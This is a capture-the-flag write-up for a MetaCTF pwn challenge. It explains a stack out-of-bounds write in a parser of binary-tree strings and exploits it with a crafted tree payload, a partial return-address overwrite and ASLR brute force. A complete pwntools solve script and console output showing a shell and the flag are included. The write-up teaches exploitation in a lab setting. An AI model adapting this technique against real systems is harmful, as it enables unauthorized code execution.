Challenge Description
The program generates and parses strings which represent Christmas trees (binary trees). Each node is a single character, and optionally followed by two sets of parens, containing the left and right child nodes. This can be defined recursively, so trees might look like…
1. A
2. A(B)(C)
3. A(B(D)(E))(C(F)(G))
4. A(B(D(H)(I))(E(J)(K)))(C(F(L)(M))(G(N)(O)))
When the program receives these strings, it parses them and stores them in a compressed array format, where the root node is at index 0
, and each left/right node are at (2*i)+1
and (2*i)+2
respectively, and recursively. Thus, the above trees would be represented in memory as…
1. A
2. ABC
3. ABCDEFG
4. ABCDEFGHIJKLMNO
For fully populated trees, the array size needed in order to deserialize the tree will always be, at most, the next power of two strictly above the number of nodes, minus one. This leads to the bug! When parsing a tree, the program simply counts the number of nodes and assumes that the tree will be fully complete. It then allocates a stack buffer just big enough to handle that tree. That assumption fails when the tree is incomplete and imbalanced, for instance with only right nodes defined, many layers deep! The small node count will lead to a small allocation, but the tree depth will lead to controlled writes well beyond the end of that array. For instance…
This tree: 0()(1()(2(3)(4)))
Will have an assumed size of 5, and thus an allocation of 7 bytes (the next nearest power of two, minus one).
But will deserialized to:
index: 012345678abcdef
value: 0.1...2......34
As you can see, we wrote 8 bytes out of bounds, well past the end of the array! The array was only allocated to hold 7 elements, but the '3'
and '4'
nodes fall outside those bounds.
Exploitation Strategy
The Christmas tree array which we will write out-of-bounds from is allocated on the stack. To make exploitation slightly easier, the program also includes a debug_shell()
function which simply drops to a /bin/bash
shell when called. Thus, we can target a return address on the stack with our out-of-bounds write, and use a “ret2win” strategy to reach the debug_shell()
function. ASLR is enabled so we will need to use a partial overwrite and a small amount of brute-force to succeed.
So, we send a very imbalanced, sparse tree. The program will far underestimate its memory requirements based on the limited number of nodes, however the depth of the nodes will lead to out of bounds access. Specifically, the 'S'
and 'i'
node values (see below) will be written to the lower two bytes of the return address. Even with ASLR on, we know the lower 12 bits of the debug_shell()
function address are 0x.....369
. So, we’ll just guess 0x.....5369
until it happens to hit! With 4 unknown bits, we can expect it to win in ~16 tries on average. (In practice I have observed it hitting as soon as the first try, or as long as 40-50 tries.)
The exploit tree we will use is: 0()(1()(2()(3(4(()(i))((S)()))())))
This will be assigned a size=7, height=3, and be deserialized to the below array, where '_'
represents an empty node, used to prevent undesirable crashes. Stack cookies are enabled, so we need to be careful not to clobber the wrong data. On the line below, A
, B
, C
, etc… represent each tree level, growing by 2x each time. [ ... ]
represents the allocated buffer, and [retaddr]
represents the return address position on the stack relative to the array.
0.1..2......3............4.........................__...................................................iS.....................
ABBCCCCDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
[ ... ] [retaddr]
Sending this string repeatedly, quickly results in a shell!
[kringle@northpole]$ python3 christmas_trees.py remote host5.metaproblems.com 7521
Attempt 1
[+] Opening connection to host5.metaproblems.com on port 7521: Done
exploit failed, trying again....
[*] Closed connection to host5.metaproblems.com port 7521
Attempt 2
[+] Opening connection to host5.metaproblems.com on port 7521: Done
exploit failed, trying again....
[*] Closed connection to host5.metaproblems.com port 7521
Attempt 3
[+] Opening connection to host5.metaproblems.com on port 7521: Done
exploit failed, trying again....
[*] Closed connection to host5.metaproblems.com port 7521
Attempt 4
[+] Opening connection to host5.metaproblems.com on port 7521: Done
exploit failed, trying again....
[*] Closed connection to host5.metaproblems.com port 7521
Attempt 5
[+] Opening connection to host5.metaproblems.com on port 7521: Done
exploit failed, trying again....
[*] Closed connection to host5.metaproblems.com port 7521
Attempt 6
[+] Opening connection to host5.metaproblems.com on port 7521: Done
exploit failed, trying again....
[*] Closed connection to host5.metaproblems.com port 7521
Attempt 7
[+] Opening connection to host5.metaproblems.com on port 7521: Done
[*] Switching to interactive mode
app 6.5.0-1015-aws #15~22.04.1-Ubuntu SMP Tue Feb 20 20:12:08 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
uid=1000 gid=1000 groups=1000
MetaCTF{0h_chr1stm4s_tr33_h0w_l0v3ly_4r3_y0ur_br4nch3s}
[*] Got EOF while reading in interactive
Solve script
from pwn import *
import time
import sys
# Here, we send a very imbalanced, sparse tree. The program will far underestimate its
# memory requirements based on the limited number of nodes, however the depth of
# the nodes will lead to out of bounds access. Specifically, the 'S' and 'i' node
# values will be written to the lower two bytes of the return address. ASLR is on
# however we know the lower 12 bits are 0x.....369. So, we'll just guess 0x.....5369
# until it happens to hit. With 4 unknown bits, we can expect it to win in ~ 16 tries
# The string we will use is: 0()(1()(2()(3(4(()(i))((S)()))())))
# This will be assigned a size=7, height=3, and be deserialized to the below array,
# where '_' represents an empty node, used to prevent undesirable crashes. Stack cookies
# are enabled, so we need to be careful not to clobber the wrong data.
# On the line below, A,B,C... represent each tree level, growing by 2x each time.
# [ ... ] represents the allocated buffer, and [retaddr] represents the return address.
# 0.1..2......3............4.........................__...................................................iS.....................
# ABBCCCCDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
# [ ... ] [retaddr]
def connect():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <local|remote> [host] [port]")
exit(0)
elif sys.argv[1] == "local":
return process("./christmas_tree.bin")
elif sys.argv[1] == "remote":
return remote(sys.argv[2], sys.argv[3])
c = 1
while True:
print(f"Attempt {c}")
p = connect()
p.sendline(b"display")
p.sendline(b"0()(1()(2()(3(4(()(i))((S)()))())))")
# Did it work?
p.sendline(b"uname -a")
try:
# Yes!
p.readuntil(b"Linux")
p.sendline(b"id")
p.sendline(b"cat flag.txt")
p.interactive()
break
except:
# Nope
print("exploit failed, trying again....")
p.close()
c += 1